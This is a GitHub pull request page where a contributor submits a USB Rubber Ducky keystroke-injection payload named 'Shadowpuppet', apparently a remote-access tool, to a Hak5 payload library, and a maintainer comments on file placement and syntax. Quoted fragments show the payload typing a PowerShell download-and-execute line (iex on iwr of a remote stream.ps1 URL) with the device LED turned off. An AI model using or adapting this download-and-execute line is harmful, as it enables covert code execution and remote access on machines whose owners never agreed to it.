Skip to content

shaddow puppet #537

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 2 commits into
base: master
Choose a base branch
from
Open

shaddow puppet #537

wants to merge 2 commits into from

Conversation

CodeRacer1
Copy link

No description provided.

@CodeRacer1 CodeRacer1 changed the title payload.txt shaddow puppet May 17, 2025
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This is in the incorrect your payload.txt file should be placed within payloads/library/CATEGORY/PAYLOAD/playload.txt
If your category is remote access, then your payload should be placed in

payloads/library/incident_response/Shadowpuppet/payload.txt

STRING LISTEN_PORT
STRING ";$url='"
STRING REMOTE_PS_URL
STRING "';iex (iwr $url).Content"
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

You can compress this STRING ENTER into one line by using STRINGLN

STRINGLN "';iex (iwr $url).Content"


REM ─── CONFIG ───────────────────────────────────────
DEFINE EXECUTE_PAYLOAD TRUE
DEFINE REMOTE_PS_URL https://yourdomain.com/streamer/stream.ps1
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Please include a readme.md explaining your payload and its configurations so the end user has a better understanding of what the payload is doing and what needs to be they need change.

@hak5peaks hak5peaks added the pending requested changes requires changes before merge label May 21, 2025
@hak5peaks
Copy link
Member

This seems to be a duplicate PR? Please close your other PR


ATTACKMODE HID
LED_OFF
DELAY 500
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

If your target machine is windows, consider using EXTENSION PASSIVE_WINDOWS_DETECT this allows the Ducky to dynamically determine when the target machine is accepting keystrokes removing the need for a long start delay.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
pending requested changes requires changes before merge
Projects
None yet
Development

Successfully merging this pull request may close these issues.

2 participants